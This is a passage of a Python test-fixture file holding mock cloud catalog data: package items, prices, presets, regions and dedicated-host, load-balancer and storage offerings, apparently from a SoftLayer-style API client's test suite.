'id': 190053,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': ''
}
]
}, {
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 193373,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 194703,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 191193,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193613,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 194943,
'locationGroupId': ''}]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '1',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 192033,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 194693,
'locationGroupId': ''
}
]
}
]
}
SAAS_REST_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': None
}
]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': None
}
]
}
]
}
activePreset1 = {
'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID',
'id': 64,
'isActive': '1',
'keyName': 'S1270_8GB_2X1TBSATA_NORAID',
'name': 'S1270 8GB 2X1TBSATA NORAID',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
activePreset2 = {
'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10',
'id': 65,
'isActive': '1',
'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10',
'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
getAllObjects = [{
'activePresets': [activePreset1],
'accountRestrictedActivePresets': [activePreset2],
'description': 'Bare Metal Server',
'firstOrderStepId': 1,
'id': 200,
'isActive': 1,
'items': HARDWARE_ITEMS,
'name': 'Bare Metal Server',
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'subDescription': 'Bare Metal Server',
'unitSize': 1,
"itemPrices": [
{
"hourlyRecurringFee": ".027",
"id": 205911,
"laborFee": "0",
"locationGroupId": 505,
"capacityRestrictionMaximum": "40",
"capacityRestrictionMinimum": "40",
"capacityRestrictionType": "CORE",
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
},
{
"hourlyRecurringFee": "0",
"id": 199467,
"laborFee": "0",
"locationGroupId": '',
"recurringFee": "0",
"item": {
"capacity": "0",
"description": "Load Balancer Bandwidth",
"id": 10051,
"keyName": "LOAD_BALANCER_BANDWIDTH",
}
},
{
"hourlyRecurringFee": ".028",
"id": 205913,
"laborFee": "0",
"locationGroupId": 507,
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
}]
}]
getItems = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
},
{
'id': 1240,
'keyName': 'KeyName014',
'capacity': '4',
'units': 'PRIVATE_CORE',
'description': 'Computing Instance (Dedicated)',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1007,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 1250,
'keyName': 'KeyName015',
'capacity': '4',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1144,
'locationGroupId': None,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 112233,
'keyName': 'KeyName016',
'capacity': '55',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 332211,
'locationGroupId': 1,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 4439,
'keyName': 'KeyName017',
'capacity': '1',
'description': '1 GB iSCSI Storage',
'itemCategory': {'categoryCode': 'iscsi'},
'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 1121,
'keyName': 'KeyName081',
'capacity': '20',
'description': '20 GB iSCSI snapshot',
'itemCategory': {'categoryCode': 'iscsi_snapshot_space'},
'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}],
},
{
'id': 4440,
'keyName': 'KeyName019',
'capacity': '4',
'description': '4 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 8880,
'keyName': 'KeyName0199',
'capacity': '8',
'description': '8 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 44400,
'keyName': 'KeyName0155',
'capacity': '4',
'description': '4 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 88800,
'keyName': 'KeyName0144',
'capacity': '8',
'description': '8 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 10,
'keyName': 'KeyName0341',
'capacity': '0',
'description': 'Global IPv4',
'itemCategory': {'categoryCode': 'global_ipv4'},
'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 66464,
'keyName': '1_IPV6_ADDRESS',
'capacity': '64',
'description': '/64 Block Portable Public IPv6 Addresses',
'itemCategory': {'categoryCode': 'static_ipv6_addresses'},
'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}],
},
{
'id': 610,
'keyName': 'KeyName031',
'capacity': '0',
'description': 'Global IPv6',
'itemCategory': {'categoryCode': 'global_ipv6'},
'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0.10',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0.1',
'setupFee': '0.1',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}}
]
getItemPricesISCSI = [
{
'currentPriceFlag': '',
'id': 2152,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 46626,
'itemPriceId': 2152, 'packageId': 0}],
'quantity': '',
'recurringFee': '.35',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22501,
'item': {'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{
'id': 252983,
'itemPriceId': 22501, 'packageId': 0
}],
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22441,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547
},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 250326,
'itemPriceId': 22441, 'packageId': 0}],
'quantity': '',
'recurringFee': '15',
'setupFee': '0',
'sort': 0
}]
getItemsVS = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
}
]
verifyOrderDH = {
'preTaxSetup': '0',
'storageGroups': [],
'postTaxRecurring': '3.164',
'billingOrderItemId': '',
'presetId': '',
'hardware': [
{
'domain': 't.com',
'hostname': 't',
'bareMetalInstanceFlag': '',
'hardwareStatusId': '',
'primaryBackendNetworkComponent': {
'router': {
'id': 51218
},
'networkVlanId': ''
},
'accountId': ''
}
],
'prices': [
{
'itemId': 10195,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '3.164',
'oneTimeFee': '0',
'id': 200269,
'item': {
'thirdPartyPolicyAssignments': [],
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'bundle': [
{
'category': {
'categoryCode': 'dedicated_host_ram',
'id': 850,
'name': 'Dedicated Host RAM'
},
'itemPriceId': 200301,
'itemPrice': {
'itemId': 10199,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200301,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41763
},
{
'category': {
'categoryCode': 'dedicated_host_disk',
'id': 851,
'name': 'Dedicated Host Disk'
},
'itemPriceId': 200299,
'itemPrice': {
'itemId': 10197,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200299,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41761
}
],
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'units': 'CORE',
'id': 10195
},
'laborFee': '0',
'categories': [
{
'categoryCode': 'dedicated_virtual_hosts',
'id': 848,
'name': 'Dedicated Host'
}
]
}
],
'sendQuoteEmailFlag': '',
'packageId': 813,
'useHourlyPricing': True,
'preTaxRecurringMonthly': '0',
'message': '',
'preTaxRecurring': '3.164',
'primaryDiskPartitionId': '',
'locationObject': {
'id': 138124,
'name': 'dal05',
'longName': 'Dallas 5'
},
'taxCompletedFlag': False,
'isManagedOrder': '',
'imageTemplateId': '',
'postTaxRecurringMonthly': '0',
'resourceGroupTemplateId': '',
'postTaxSetup': '0',
'sshKeys': [],
'location': '138124',
'stepId': '',
'proratedInitialCharge': '0',
'totalRecurringTax': '0',
'paymentType': '',
'resourceGroupId': '',
'sourceVirtualGuestId': '',
'bigDataOrderFlag': False,
'extendedHardwareTesting': '',
'preTaxRecurringHourly': '3.164',
'postTaxRecurringHourly': '3.164',
'currencyShortName': 'USD',
'containerSplHash': '000000003699c54000007f38ef8b0102',
'proratedOrderTotal': '0',
'serverCoreCount': '',
'privateCloudOrderFlag': False,
'totalSetupTax': '0',
'quantity': 1
}
itemsLoadbal = [
{
"capacity": "0",
"description": "Load Balancer as a Service",
"id": 10043,
"keyName": "LOAD_BALANCER_AS_A_SERVICE",
"itemCategory": {
"categoryCode": "load_balancer_as_a_service",
"id": 1116,
"name": "Load Balancer As A Service",
},
"prices": [
{
"hourlyRecurringFee": "0",
"id": 199447,
"locationGroupId": '',
"recurringFee": "0",
}
]
},
{
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
"itemCategory": {
"categoryCode": "load_balancer_uptime",
"id": 1119,
"name": "Load Balancer Uptime",
},
"prices": [
{
"hourlyRecurringFee": ".028",
"id": 205913,
"locationGroupId": 507,
}]}
]
regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01',
"groups": [
{
"description": "Location Group 4",
"id": 507,
"locationGroupTypeId": 82,
"name": "Location Group 4",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Cross Region - EU",
"id": 1303,
"locationGroupTypeId": 82,
"name": "eu",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Regional Frankfurt",
"id": 1783,
"locationGroupTypeId": 82,
"name": "eu-de",
"locationGroupType": {
"name": "PRICING"
}
}
]
}},
'sortOrder': 10}]
getAllObjectsLoadbal = [
{
"id": 805,
"keyName": "LBAAS",
"name": "Load Balancer As A Service (LBaaS)",
"items": itemsLoadbal,
"regions": regionsLoadbal
}
]
getAllObjectsDH = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores X 242 RAM X 1.2 TB",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "242_GB_RAM",
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_242_RAM_X_1_4_TB",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getAllObjectsDHGpu = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getRegions = [{
"description": "WDC07 - Washington, DC",
"keyname": "WASHINGTON07",
"location": {
"locationId": 2017603,
"location": {
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"priceGroups": [
{
"description": "COS Regional - US East",
"id": 1305,
"locationGroupTypeId": 82,
"name": "us-east",
"locationGroupType": {
"name": "PRICING"
}
}
]
}
},
"locations": [{
"location": {
"euCompliantFlag": False,
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"statusId": 2},
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 2017603,
"packageId": 46
}]
}]
}]
getItemPrices = [
{
"hourlyRecurringFee": ".093",
"id": 204015,
"recurringFee": "62",
"categories": [
{
"categoryCode": "guest_core"
}
],
"item": {
"description": "4 x 2.0 GHz or higher Cores",
"id": 859,
"keyName": "GUEST_CORES_4",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2,
"regions": [
{
"description": "MON01 - Montreal",
"keyname": "MONTREAL",
"sortOrder": 94
}
]
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2,
"regions": [
{
"description": "AMS02 POP - Amsterdam",
"keyname": "AMSTERDAM02",
"sortOrder": 12
}
]
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".006",
"id": 204663,
"recurringFee": "4.1",
"item": {
"description": "100 GB (LOCAL)",
"id": 3899,
"keyName": "GUEST_DISK_100_GB_LOCAL_3",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".217",
"id": 204255,
"recurringFee": "144",
"item": {
"description": "16 GB ",
"id": 1017,
"keyName": "RAM_16_GB",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
}
]
getActivePresets = [
{
"description": "M1.64x512x25",
"id": 799,
"isActive": "1",
"keyName": "M1_64X512X25",
"name": "M1.64x512x25",
"packageId": 835
},
{
"description": "M1.56x448x100",
"id": 797,
"isActive": "1",
"keyName": "M1_56X448X100",
"name": "M1.56x448x100",
"packageId": 835
},
{
"description": "M1.64x512x100",
"id": 801,
"isActive": "1",
"keyName": "M1_64X512X100",
"name": "M1.64x512x100",
"packageId": 835
}
]
getAccountRestrictedActivePresets = []
RESERVED_CAPACITY = [{"id": 1059}]
getItems_RESERVED_CAPACITY = [
{
'id': 12273,
'keyName': 'B1_1X2_1_YEAR_TERM',
'description': 'B1 1x2 1 year term',
'capacity': 12,
'itemCategory': {
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '.032',
'id': 217561,
'itemId': 12273,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
}
]
}
]
}
]
getItems_1_IPV6_ADDRESS = [
{
'id': 4097,
'keyName': '1_IPV6_ADDRESS',
'itemCategory': {
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
'itemId': 4097,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
}
]
}
]
}
]
getObject = {
'id': 200,
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'accountRestrictedActivePresets': [],
'activePresets': [
{
'description': 'AC2.8x60x25',
'id': 861,
'isActive': '1',
'keyName': 'AC2_8X60X25',
'name': 'AC2.8x60x25',
'packageId': 835
},
{
'description': 'AC2.8x60x100',
'id': 863,
'isActive': '1',
'keyName': 'AC2_8X60X100',
'name': 'AC2.8x60x100',
'packageId': 835
}],
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
